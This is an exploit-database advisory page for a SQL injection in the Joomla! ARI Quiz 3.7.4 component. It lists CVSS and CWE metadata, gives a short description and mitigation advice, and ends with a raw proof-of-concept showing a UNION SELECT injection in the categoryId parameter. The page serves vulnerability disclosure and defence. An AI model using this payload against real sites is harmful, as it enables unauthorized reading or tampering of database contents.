header-logo
Suggest Exploit
vendor:
ARI Quiz
by:
Mr Winst0n
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: ARI Quiz
Affected Version From: 3.7.4
Affected Version To: 3.7.4
Patch Exists: NO
Related CWE: N/A
CPE: a:ari_soft:ari_quiz
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux, Windows 8.1
2019

Joomla! Component ARI Quiz 3.7.4 – SQL Injection

A SQL injection vulnerability exists in Joomla! Component ARI Quiz 3.7.4. An attacker can send a malicious HTTP request to the vulnerable server and execute arbitrary SQL commands in the back-end database. This can be exploited to manipulate or disclose arbitrary data in the back-end database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries. Additionally, parameterized queries should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# Exploit Title: Joomla! Component ARI Quiz 3.7.4 - SQL Injection
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan@gmail.com
# Discovery Date: April 27, 2019
# Vendor Homepage: http://www.ari-soft.com
# Software Link : https://extensions.joomla.org/extensions/extension/living/education-a-culture/ari-quiz/
# Tested Version: 3.7.4
# Tested on: Kali linux, Windows 8.1 


# PoC:

# http://localhost/[PATH]/index.php?option=com_ariquiz&view=category&categoryId=SQLi&Itemid=236
# http://localhost/[PATH]/index.php?option=com_ariquiz&view=category&categoryId=6%27and%200%20union%20select%201,2,3--%20-&Itemid=236